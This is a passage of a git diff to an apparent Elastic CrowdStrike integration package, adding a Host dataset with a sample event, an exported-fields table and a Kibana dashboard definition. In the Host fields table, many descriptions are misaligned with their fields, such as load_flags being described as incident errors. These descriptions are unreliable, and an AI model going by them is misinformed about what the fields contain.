@@ -404,9 +965,9 @@ An example event for `falcon` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "id": "df7cb44a-7978-449c-992e-c6b22e788ae9", "snapshot": false, - "version": "8.10.1" + "version": "8.11.0" }, "event": { "action": [ @@ -418,7 +979,7 @@ An example event for `falcon` looks as following: ], "created": "2020-02-12T21:29:10.710Z", "dataset": "crowdstrike.falcon", - "ingested": "2023-09-26T13:19:10Z", + "ingested": "2024-01-29T08:59:16Z", "kind": "event", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 0,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581542950710,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"api-client-id:1234567890abcdefghijklmnopqrstuvwxyz\",\n \"UserIp\": \"10.10.0.8\",\n \"OperationName\": \"streamStarted\",\n \"ServiceName\": \"Crowdstrike Streaming API\",\n \"Success\": true,\n \"UTCTimestamp\": 1581542950,\n \"AuditKeyValues\": [\n {\n \"Key\": \"APIClientID\",\n \"ValueString\": \"1234567890abcdefghijklmnopqr\"\n },\n {\n \"Key\": \"partition\",\n \"ValueString\": \"0\"\n },\n {\n \"Key\": \"offset\",\n \"ValueString\": \"-1\"\n },\n {\n \"Key\": \"appId\",\n \"ValueString\": \"siem-connector-v2.0.0\"\n },\n {\n \"Key\": \"eventType\",\n \"ValueString\": \"[UserActivityAuditEvent HashSpreadingEvent RemoteResponseSessionStartEvent RemoteResponseSessionEndEvent DetectionSummaryEvent AuthActivityAuditEvent]\"\n }\n ]\n }\n}", "outcome": "success" 
@@ -1009,6 +1570,7 @@ and/or `session_token`.
 | event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword |
 | file.device | Device that is the source of the file. | keyword |
 | file.directory | Directory where the file is located. It should include the drive letter, when appropriate. | keyword |
+| file.drive_letter | Drive letter where the file is located. This field is only relevant on Windows. The value should be uppercase, and not include the colon. | keyword |
 | file.extension | File extension, excluding the leading dot. Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). | keyword |
 | file.hash.sha256 | SHA256 hash. | keyword |
 | file.inode | Inode representing the file in the filesystem. | keyword | 
@@ -1017,11 +1579,13 @@ and/or `session_token`.
 | file.path.text | Multi-field of `file.path`. | match_only_text |
 | file.size | File size in bytes. Only relevant when `file.type` is "file". | long |
 | file.type | File type (file, dir, or symlink). | keyword |
+| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword |
 | host.geo.city_name | City name. | keyword |
 | host.geo.continent_name | Name of the continent. | keyword |
 | host.geo.country_name | Country name. | keyword |
 | host.geo.timezone | The time zone of the location, such as IANA time zone name. | keyword |
 | host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword |
+| host.ip | Host ip addresses. | ip |
 | host.name | Name of the host. It can contain what hostname returns on Unix systems, the fully qualified domain name (FQDN), or a name specified by the user. The recommended value is the lowercase FQDN of the host. | keyword |
 | host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. If the OS you're dealing with is not listed as an expected value, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword |
 | host.os.version | Operating system version as a raw string. | keyword | 
@@ -1320,3 +1884,343 @@ An example event for `fdr` looks as following: } } ``` + +### Host + +This is the `Host` dataset. + +#### Example + +An example event for `host` looks as following: + +```json +{ + "@timestamp": "2023-11-07T10:26:53.000Z", + "agent": { + "ephemeral_id": "5805cb9f-4413-4da3-8da7-b85cd99c2961", + "id": "b095b147-68c9-47a8-a1fc-7fd9dc3764c5", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.11.0" + }, + "crowdstrike": { + "host": { + "agent": { + "load_flags": "0", + "local_time": "2023-11-07T04:51:16.678Z", + "version": "7.05.17603.0" + }, + "bios": { + "manufacturer": "ABCInc.", + "version": "2020.0.1.0.0(iBridge:22.11.000.0.0,0)" + }, + "chassis_type": { + "desc": "Laptop", + "value": "9" + }, + "cid": "92012896127c4948236ba7601b886b0", + "config_id": { + "base": "6594763", + "build": "1703", + "platform": "4" + }, + "connection_ip": "81.2.69.192", + "cpu_signature": "460517", + "device_policies": { + "device_control": { + "applied": true, + "applied_date": "2023-06-20T08:45:26.341Z", + "assigned_date": "2023-06-20T08:43:47.736Z", + "policy_id": "2f88daf0177f467dae69262a5ce71775", + "policy_type": "device-control" + }, + "firewall": { + "applied": true, + "applied_date": "2023-09-11T10:33:44.174Z", + "assigned_date": "2023-09-11T10:32:47.853Z", + "policy": { + "id": "1ee301f7e3e24e96ad6a23c73aaac1e3", + "type": "firewall" + }, + "rule_set_id": "1ee301f7e3e24e96ad6a23c73aaac1e3" + }, + "global_config": { + "applied": true, + "applied_date": "2023-11-07T04:52:59.515Z", + "assigned_date": "2023-11-07T04:51:18.946Z", + "policy": { + "id": "7e3078b60976486cac5dc998808d9135", + "type": "globalconfig" + }, + "settings_hash": "f01def74" + }, + "prevention": { + "applied": true, + "applied_date": "2023-06-08T10:04:47.643Z", + "assigned_date": "2023-06-08T10:03:49.505Z", + "policy": { + "id": "1024fac1b279424fa7300b8ac2d56be5", + "type": "prevention" + }, + "settings_hash": "f7a54ca1" + }, + "remote_response": { + "applied": true, 
+ "applied_date": "2023-06-08T10:04:47.017Z", + "assigned_date": "2023-06-08T10:03:49.505Z", + "policy": { + "id": "dabb4def99034f11b9b3d52271584c9f", + "type": "remote-response" + }, + "settings_hash": "8a548e5e" + }, + "sensor_update": { + "applied": true, + "applied_date": "2023-11-07T04:52:59.659Z", + "assigned_date": "2023-11-07T04:47:43.342Z", + "policy": { + "id": "64bfa2bbcd4e46da92a66b107933da11", + "type": "sensor-update" + }, + "settings_hash": "tagged|18;101", + "uninstall_protection": "ENABLED" + } + }, + "external_ip": "81.2.69.192", + "first_seen": "2023-06-08T10:00:19.000Z", + "group_hash": "b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77", + "groups": [ + "182388a8dbea4c44b5e019cfd32c2695" + ], + "hostname": "CLM101-131.local", + "id": "3114433dbce478ca48d9a828b9b34be", + "kernel_version": "22.6.0", + "last_seen": "2023-11-07T10:25:24.000Z", + "local_ip": "81.2.69.142", + "mac_address": "14-7D-DA-AD-AC-71", + "machine_domain": "SYS", + "major_version": "22", + "meta": { + "version": "6002", + "version_string": "7:43570272778" + }, + "minor_version": "6", + "modified_timestamp": "2023-11-07T10:26:53.000Z", + "os": { + "build": "22G120", + "version": "Ventura(13)" + }, + "platform": { + "id": "1", + "name": "Mac" + }, + "policies": [ + { + "applied": true, + "applied_date": "2023-06-08T10:04:47.643Z", + "assigned_date": "2023-06-08T10:03:49.505Z", + "policy": { + "id": "1024fac1b279424fa7300b8ac2d56be5", + "type": "prevention" + }, + "settings_hash": "f7a54ca1" + } + ], + "product_type_desc": "Workstation", + "provision_status": "Provisioned", + "reduced_functionality_mode": "no", + "serial_number": "FVFDH73HMNHX", + "site_name": "Default-First-Site-Name", + "status": "normal", + "system": { + "manufacturer": "ABCInc.", + "product_name": "Air,1" + }, + "tags": [ + "tags" + ] + } + }, + "data_stream": { + "dataset": "crowdstrike.host", + "namespace": "ep", + "type": "logs" + }, + "device": { + "id": "3114433dbce478ca48d9a828b9b34be" + 
}, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "b095b147-68c9-47a8-a1fc-7fd9dc3764c5", + "snapshot": false, + "version": "8.11.0" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "host" + ], + "dataset": "crowdstrike.host", + "ingested": "2024-01-22T13:24:41Z", + "kind": "event", + "original": "{\"agent_load_flags\":\"0\",\"agent_local_time\":\"2023-11-07T04:51:16.678Z\",\"agent_version\":\"7.05.17603.0\",\"bios_manufacturer\":\"ABCInc.\",\"bios_version\":\"2020.0.1.0.0(iBridge:22.11.000.0.0,0)\",\"chassis_type\":\"9\",\"chassis_type_desc\":\"Laptop\",\"cid\":\"92012896127c4948236ba7601b886b0\",\"config_id_base\":\"6594763\",\"config_id_build\":\"1703\",\"config_id_platform\":\"4\",\"connection_ip\":\"81.2.69.192\",\"cpu_signature\":\"460517\",\"device_id\":\"3114433dbce478ca48d9a828b9b34be\",\"device_policies\":{\"device_control\":{\"applied\":true,\"applied_date\":\"2023-06-20T08:45:26.341093915Z\",\"assigned_date\":\"2023-06-20T08:43:47.736146738Z\",\"policy_id\":\"2f88daf0177f467dae69262a5ce71775\",\"policy_type\":\"device-control\"},\"firewall\":{\"applied\":true,\"applied_date\":\"2023-09-11T10:33:44.174488832Z\",\"assigned_date\":\"2023-09-11T10:32:47.853976945Z\",\"policy_id\":\"1ee301f7e3e24e96ad6a23c73aaac1e3\",\"policy_type\":\"firewall\",\"rule_set_id\":\"1ee301f7e3e24e96ad6a23c73aaac1e3\"},\"global_config\":{\"applied\":true,\"applied_date\":\"2023-11-07T04:52:59.515775409Z\",\"assigned_date\":\"2023-11-07T04:51:18.94671252Z\",\"policy_id\":\"7e3078b60976486cac5dc998808d9135\",\"policy_type\":\"globalconfig\",\"settings_hash\":\"f01def74\"},\"prevention\":{\"applied\":true,\"applied_date\":\"2023-06-08T10:04:47.643357971Z\",\"assigned_date\":\"2023-06-08T10:03:49.505180252Z\",\"policy_id\":\"1024fac1b279424fa7300b8ac2d56be5\",\"policy_type\":\"prevention\",\"rule_groups\":[],\"settings_hash\":\"f7a54ca1\"},\"remote_response\":{\"applied\":true,\"applied_date\":\"2023-06-08T10:04:47.01735027Z\",\"assigned_date\"
:\"2023-06-08T10:03:49.505163572Z\",\"policy_id\":\"dabb4def99034f11b9b3d52271584c9f\",\"policy_type\":\"remote-response\",\"settings_hash\":\"8a548e5e\"},\"sensor_update\":{\"applied\":true,\"applied_date\":\"2023-11-07T04:52:59.659583066Z\",\"assigned_date\":\"2023-11-07T04:47:43.342175341Z\",\"policy_id\":\"64bfa2bbcd4e46da92a66b107933da11\",\"policy_type\":\"sensor-update\",\"settings_hash\":\"tagged|18;101\",\"uninstall_protection\":\"ENABLED\"}},\"external_ip\":\"81.2.69.192\",\"first_seen\":\"2023-06-08T10:00:19Z\",\"group_hash\":\"b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77\",\"groups\":[\"182388a8dbea4c44b5e019cfd32c2695\"],\"hostname\":\"CLM101-131.local\",\"kernel_version\":\"22.6.0\",\"last_seen\":\"2023-11-07T10:25:24Z\",\"local_ip\":\"81.2.69.142\",\"mac_address\":\"14-7d-da-ad-ac-71\",\"machine_domain\":\"SYS\",\"major_version\":\"22\",\"meta\":{\"version\":\"6002\",\"version_string\":\"7:43570272778\"},\"minor_version\":\"6\",\"modified_timestamp\":\"2023-11-07T10:26:53Z\",\"os_build\":\"22G120\",\"os_version\":\"Ventura(13)\",\"platform_id\":\"1\",\"platform_name\":\"Mac\",\"policies\":[{\"applied\":true,\"applied_date\":\"2023-06-08T10:04:47.643357971Z\",\"assigned_date\":\"2023-06-08T10:03:49.505180252Z\",\"policy_id\":\"1024fac1b279424fa7300b8ac2d56be5\",\"policy_type\":\"prevention\",\"rule_groups\":[],\"settings_hash\":\"f7a54ca1\"}],\"product_type_desc\":\"Workstation\",\"provision_status\":\"Provisioned\",\"reduced_functionality_mode\":\"no\",\"serial_number\":\"FVFDH73HMNHX\",\"site_name\":\"Default-First-Site-Name\",\"status\":\"normal\",\"system_manufacturer\":\"ABCInc.\",\"system_product_name\":\"Air,1\",\"tags\":[\"tags\"]}", + "type": [ + "info" + ] + }, + "host": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + 
"hostname": "CLM101-131.local", + "ip": [ + "81.2.69.192" + ], + "mac": [ + "14-7D-DA-AD-AC-71" + ], + "os": { + "full": "Ventura(13)", + "platform": "Mac" + } + }, + "input": { + "type": "cel" + }, + "related": { + "hash": [ + "f01def74", + "f7a54ca1", + "8a548e5e", + "tagged|18;101", + "b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77" + ], + "hosts": [ + "CLM101-131.local", + "SYS" + ], + "ip": [ + "81.2.69.192", + "81.2.69.142" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields", + "forwarded", + "crowdstrike-host" + ] +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| crowdstrike.host.agent.load_flags | Any errors associated with the incident. | keyword | +| crowdstrike.host.agent.local_time | The fine score associated with the incident. | date | +| crowdstrike.host.agent.version | The list of host IDs associated with the incident. | keyword | +| crowdstrike.host.bios.manufacturer | Flags indicating the load status of the agent on the host. | keyword | +| crowdstrike.host.bios.version | The local time on the host where the agent is running. | keyword | +| crowdstrike.host.chassis_type.desc | The version of the agent running on the host. | keyword | +| crowdstrike.host.chassis_type.value | The manufacturer of the BIOS on the host. | keyword | +| crowdstrike.host.cid | The version of the BIOS on the host. | keyword | +| crowdstrike.host.config_id.base | The customer ID associated with the host. | keyword | +| crowdstrike.host.config_id.build | The base configuration ID associated with the host. | keyword | +| crowdstrike.host.config_id.platform | The build configuration ID associated with the host. | keyword | +| crowdstrike.host.connection_ip | The platform configuration ID associated with the host. | ip | +| crowdstrike.host.cpu_signature | The device ID associated with the host. 
| keyword | +| crowdstrike.host.device_policies.device_control.applied | Timestamp indicating when the host was first seen. | boolean | +| crowdstrike.host.device_policies.device_control.applied_date | The groups associated with the host. | date | +| crowdstrike.host.device_policies.device_control.assigned_date | Timestamp indicating when the host was last seen. | date | +| crowdstrike.host.device_policies.device_control.policy_id | The local IP address of the host. | keyword | +| crowdstrike.host.device_policies.device_control.policy_type | The domain to which the machine belongs. | keyword | +| crowdstrike.host.device_policies.firewall.applied | The major version of the operating system on the host. | boolean | +| crowdstrike.host.device_policies.firewall.applied_date | The minor version of the operating system on the host. | date | +| crowdstrike.host.device_policies.firewall.assigned_date | Timestamp indicating when the host information was last modified. | date | +| crowdstrike.host.device_policies.firewall.policy.id | The organizational units associated with the host. | keyword | +| crowdstrike.host.device_policies.firewall.policy.type | The platform ID of the host. | keyword | +| crowdstrike.host.device_policies.firewall.rule_set_id | The platform name of the host. | keyword | +| crowdstrike.host.device_policies.global_config.applied | The description of the product type of the host. | boolean | +| crowdstrike.host.device_policies.global_config.applied_date | The product type of the host. | date | +| crowdstrike.host.device_policies.global_config.assigned_date | The site name associated with the host. | date | +| crowdstrike.host.device_policies.global_config.policy.id | The status of the host. | keyword | +| crowdstrike.host.device_policies.global_config.policy.type | The manufacturer of the system on the host. | keyword | +| crowdstrike.host.device_policies.global_config.settings_hash | The product name of the system on the host. 
| keyword | +| crowdstrike.host.device_policies.prevention.applied | The objectives associated with the incident. | boolean | +| crowdstrike.host.device_policies.prevention.applied_date | The state of the incident, whether open or closed. | date | +| crowdstrike.host.device_policies.prevention.assigned_date | The status of the incident. | date | +| crowdstrike.host.device_policies.prevention.policy.id | The tactics associated with the incident. | keyword | +| crowdstrike.host.device_policies.prevention.policy.type | The techniques associated with the incident. | keyword | +| crowdstrike.host.device_policies.prevention.rule_groups | The type of incident. | keyword | +| crowdstrike.host.device_policies.prevention.settings_hash | The users associated with the incident. | keyword | +| crowdstrike.host.device_policies.remote_response.applied | | boolean | +| crowdstrike.host.device_policies.remote_response.applied_date | | date | +| crowdstrike.host.device_policies.remote_response.assigned_date | | date | +| crowdstrike.host.device_policies.remote_response.policy.id | | keyword | +| crowdstrike.host.device_policies.remote_response.policy.type | | keyword | +| crowdstrike.host.device_policies.remote_response.settings_hash | | keyword | +| crowdstrike.host.device_policies.sensor_update.applied | | boolean | +| crowdstrike.host.device_policies.sensor_update.applied_date | | date | +| crowdstrike.host.device_policies.sensor_update.assigned_date | | date | +| crowdstrike.host.device_policies.sensor_update.policy.id | | keyword | +| crowdstrike.host.device_policies.sensor_update.policy.type | | keyword | +| crowdstrike.host.device_policies.sensor_update.settings_hash | | keyword | +| crowdstrike.host.device_policies.sensor_update.uninstall_protection | | keyword | +| crowdstrike.host.external_ip | The external IP address of the host. 
| ip | +| crowdstrike.host.first_seen | | date | +| crowdstrike.host.group_hash | | keyword | +| crowdstrike.host.groups | | keyword | +| crowdstrike.host.hostname | The hostname of the host. | keyword | +| crowdstrike.host.id | Timestamp indicating when the incident started. | keyword | +| crowdstrike.host.kernel_version | | keyword | +| crowdstrike.host.last_seen | | date | +| crowdstrike.host.local_ip | | ip | +| crowdstrike.host.mac_address | The MAC address of the host. | keyword | +| crowdstrike.host.machine_domain | | keyword | +| crowdstrike.host.major_version | | keyword | +| crowdstrike.host.meta.version | | keyword | +| crowdstrike.host.meta.version_string | | keyword | +| crowdstrike.host.minor_version | | keyword | +| crowdstrike.host.modified_timestamp | Timestamp indicating when the incident was created. | date | +| crowdstrike.host.os.build | | keyword | +| crowdstrike.host.os.version | The version of the operating system on the host. | keyword | +| crowdstrike.host.platform.id | | keyword | +| crowdstrike.host.platform.name | The identifier associated with the customer. | keyword | +| crowdstrike.host.policies.applied | | boolean | +| crowdstrike.host.policies.applied_date | | date | +| crowdstrike.host.policies.assigned_date | | date | +| crowdstrike.host.policies.policy.id | | keyword | +| crowdstrike.host.policies.policy.type | | keyword | +| crowdstrike.host.policies.rule_groups | | keyword | +| crowdstrike.host.policies.settings_hash | | keyword | +| crowdstrike.host.product_type_desc | | keyword | +| crowdstrike.host.provision_status | | keyword | +| crowdstrike.host.reduced_functionality_mode | | keyword | +| crowdstrike.host.serial_number | | keyword | +| crowdstrike.host.site_name | | keyword | +| crowdstrike.host.status | | keyword | +| crowdstrike.host.system.manufacturer | | keyword | +| crowdstrike.host.system.product_name | | keyword | +| crowdstrike.host.tags | | keyword | +| data_stream.dataset | Data stream dataset. 
| constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| event.dataset | Event dataset. | constant_keyword | +| event.module | Event module. | constant_keyword | +| input.type | Type of filebeat input. | keyword | +| log.offset | Log offset. | long | +| tags | User defined tags. | keyword | + diff --git a/packages/crowdstrike/img/crowdstrike-alert-dashboard.png b/packages/crowdstrike/img/crowdstrike-alert-dashboard.png new file mode 100644 index 00000000000..f26d46ea9e6 Binary files /dev/null and b/packages/crowdstrike/img/crowdstrike-alert-dashboard.png differ diff --git a/packages/crowdstrike/img/crowdstrike-host-dashboard.png b/packages/crowdstrike/img/crowdstrike-host-dashboard.png new file mode 100644 index 00000000000..0b2d904d9b7 Binary files /dev/null and b/packages/crowdstrike/img/crowdstrike-host-dashboard.png differ diff --git a/packages/crowdstrike/kibana/dashboard/crowdstrike-2921b7f0-99b5-11ee-bf4d-afbc95e0486c.json b/packages/crowdstrike/kibana/dashboard/crowdstrike-2921b7f0-99b5-11ee-bf4d-afbc95e0486c.json new file mode 100644 index 00000000000..a544d2c8738 --- /dev/null +++ b/packages/crowdstrike/kibana/dashboard/crowdstrike-2921b7f0-99b5-11ee-bf4d-afbc95e0486c.json 
@@ -0,0 +1,740 @@ +{ + "attributes": { + "description": "Overview of the CrowdStrike Host Logs.", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "**Navigation**\n\n**Crowdstrike** \n\n[Overview](#/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750) \n\n[FDR](#/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f) \n\n[Falcon](#/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750) \n\n[Alert](#/dashboard/crowdstrike-d8070b00-99b3-11ee-bf4d-afbc95e0486c)\n\n**[Host](#/dashboard/crowdstrike-2921b7f0-99b5-11ee-bf4d-afbc95e0486c)**\n\n**Overview**\n\nThis dashboard shows statistics about the different hosts collected from the Crowdstrike Host/Device API.\n\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 17, + "i": "2676352c-5dfb-46c3-9c78-243d73fd2176", + "w": 14, + "x": 0, + "y": 0 + }, + "panelIndex": "2676352c-5dfb-46c3-9c78-243d73fd2176", + "title": "Table of Contents", + "type": "visualization", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-200a15f3-d229-4812-ab0c-0241c9ca974e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "af92b18a-b19c-4eea-88d7-7eef6ca7cea7", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + 
"200a15f3-d229-4812-ab0c-0241c9ca974e": { + "columnOrder": [ + "b974dbbc-5ef2-4a53-bdb1-c8e089e39c8a", + "a73f0321-68b2-4319-9d06-3eb2eb117191" + ], + "columns": { + "a73f0321-68b2-4319-9d06-3eb2eb117191": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "b974dbbc-5ef2-4a53-bdb1-c8e089e39c8a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host OS Platform", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "a73f0321-68b2-4319-9d06-3eb2eb117191", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "host.os.platform" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "af92b18a-b19c-4eea-88d7-7eef6ca7cea7", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.host" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.host" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "200a15f3-d229-4812-ab0c-0241c9ca974e", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "a73f0321-68b2-4319-9d06-3eb2eb117191" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + 
"b974dbbc-5ef2-4a53-bdb1-c8e089e39c8a" + ], + "truncateLegend": false + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 17, + "i": "cfed76fa-d3ba-450b-8c8b-03a7e2834f7a", + "w": 16, + "x": 14, + "y": 0 + }, + "panelIndex": "cfed76fa-d3ba-450b-8c8b-03a7e2834f7a", + "title": "Host over OS Platform [Logs CrowdStrike]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-b6c130c0-83a9-4114-a597-1044d0ee891a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4275918f-e9ad-4439-b16c-190021e6a4dd", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "b6c130c0-83a9-4114-a597-1044d0ee891a": { + "columnOrder": [ + "980e0385-d489-4539-b0c8-3926472b30b0", + "d016ebe9-0bc9-4877-b874-045c3c619a6c" + ], + "columns": { + "980e0385-d489-4539-b0c8-3926472b30b0": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Hostname", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "d016ebe9-0bc9-4877-b874-045c3c619a6c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.hostname" + }, + "d016ebe9-0bc9-4877-b874-045c3c619a6c": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + 
"indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "4275918f-e9ad-4439-b16c-190021e6a4dd", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.host" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.host" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "d016ebe9-0bc9-4877-b874-045c3c619a6c" + ], + "layerId": "b6c130c0-83a9-4114-a597-1044d0ee891a", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "980e0385-d489-4539-b0c8-3926472b30b0" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 17, + "i": "be658e9b-1f41-424b-a975-ab42befcb77e", + "w": 18, + "x": 30, + "y": 0 + }, + "panelIndex": "be658e9b-1f41-424b-a975-ab42befcb77e", + "title": "Host over Hostname [Logs CrowdStrike]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ae6624d7-cc20-420b-994e-e9da30ce9d7e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a10dc271-d00d-4766-8ec4-28fe3978afea", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ae6624d7-cc20-420b-994e-e9da30ce9d7e": { + "columnOrder": [ + 
"55ced9a5-9461-4aba-a522-92fad79ab843", + "dabab91c-4be8-4356-969c-270e7f21d6ba" + ], + "columns": { + "55ced9a5-9461-4aba-a522-92fad79ab843": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Host IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "dabab91c-4be8-4356-969c-270e7f21d6ba", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.ip" + }, + "dabab91c-4be8-4356-969c-270e7f21d6ba": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "a10dc271-d00d-4766-8ec4-28fe3978afea", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.host" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.host" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "dabab91c-4be8-4356-969c-270e7f21d6ba" + ], + "layerId": "ae6624d7-cc20-420b-994e-e9da30ce9d7e", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "55ced9a5-9461-4aba-a522-92fad79ab843" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + 
